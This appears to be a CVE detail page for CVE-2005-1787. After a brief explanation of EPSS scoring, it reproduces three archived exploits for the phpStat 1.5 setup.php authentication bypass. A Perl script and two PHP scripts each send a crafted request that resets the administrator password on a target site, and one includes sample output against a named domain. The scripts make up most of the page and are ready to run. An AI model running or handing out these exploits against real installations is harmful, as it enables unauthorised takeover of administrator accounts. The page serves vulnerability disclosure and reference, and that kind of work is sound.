CVE-2005-1787 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl ##################################################################### #T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ##################################################################### # EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ) #E-Mail : [email protected] # #This Xpl Change Admin's Pass in This Portal !! #Discovered by: SoulBlack # #Vulnerable Version : phpStat 1.5 # ##################################################################### # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # # So Iranian Hacking & Security Teams : # # Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT ##################################################################### use IO::Socket; if (@ARGV < 3) { print "\n==========================================\n"; print " \n -- Exploit By Alpha Programmer --\n\n"; print " Trap-Set UnderGrounD Hacking Team \n\n"; print " Usage: <T4rg3t> <DIR> <Password>\n\n"; print "==========================================\n\n"; print "Examples:\n\n"; print " phpStat.pl www.Site.com /phpstat/ 12345\n"; exit(); } my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "C4nn0t C0nn3ct to $host" } print "C0nn3cted\n"; $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n"; $http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; $http .= "Host: $host\n\n\n\n"; print "[+]Sending H3ll Packet ...\n"; print $remote $http; sleep(1); print "[+]Wait For Authentication Bypass ...\n"; sleep(100); while (<$remote>) { } print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; print "[+]User: admin\n"; print "[+]Pass: $ARGV[2]"; # milw0rm.com [2005-05-30]

<?php error_reporting(E_PARSE); /* ================================================================ PHP Stat Administrative User Authentication Bypass POC Exploit ================================================================ ====Trap-Set Underground Hacking Team===========mh_p0rtal============ Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams : Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam , CrouZ Security Team , Simorgh-ev Security Team , ====================^^^^^^^^^^^^^^^^^^^-========================= */ # Config ________________________________ # address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php $url = "http://www.site.com/setup.php"; # EnD ___________________________________ print "<form action=\"$url?check=yes&username=$username&password=$password\" >"; print "<input type=\"hidden\" name=\"check\" value=\"yes\">"; print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>"; print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>"; print ("<input type=submit value=::Change. > \n"); print "</form>"; //------------------------------------------------------End. ?> # milw0rm.com [2005-05-30]

<? /* ************************************************************** PHP Stat Administrative User Authentication Bypass POC Exploit Code by Nikyt0x - Soulblack Security Research ************************************************************** Advisory: http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt Saludos: Soulblack Staff, Status-x, NeosecurityTeam, KingMetal, SWP, Trespasser... [email protected] http://www.nikyt0x.tk ************************************************************** **This Exploit Change Admin Username and Password **Username: admin **Password: admin ************************************************************** php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php ============================================================== PHP Stat Administrative User Authentication Bypass POC Exploit ============================================================== by Nikyt0x - Soulblack Security Research [+] Testing: www.spazfarm.com [+] Socket [+] Sending Exploit [+] OK Open www.spazfarm.com/spazstats/setup.php Username: admin Password: 123456 ************************************************************** */ // username and password $username = "admin"; $password = "123456"; function sh0w() { echo "\n ==============================================================\n"; echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n"; echo " ==============================================================\n"; echo " by Nikyt0x - Soulblack Security Research\n\n"; } if ($argc != 3) { sh0w(); echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n"; exit(); } if(!ereg('setup.php',$argv[2])) { echo "URL to setup.php Incorrect.\n"; exit(0); } sh0w(); echo " [+] Testing: $argv[1]\n"; $s0ck3t = fsockopen($argv[1], 80); if (!$s0ck3t) { echo " [-] Socket\n"; exit(0); } else { $petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n"; $petici0n .= "Host: $argv[1]\r\n"; $petici0n .= "Connection: Close\r\n\r\n"; echo " [+] Socket\n"; if(!fwrite($s0ck3t, $petici0n)) { echo " [-] Sending Exploit\n"; exit(0); } echo " [+] Sending Exploit\n"; while (!feof($s0ck3t)) { $g3tdata = fgets($s0ck3t, 1024); if (eregi('Setup has been updated',$g3tdata)) { echo " [+] OK\n\n"; echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n"; exit(); } } fclose($s0ck3t); } ?> # milw0rm.com [2005-05-30]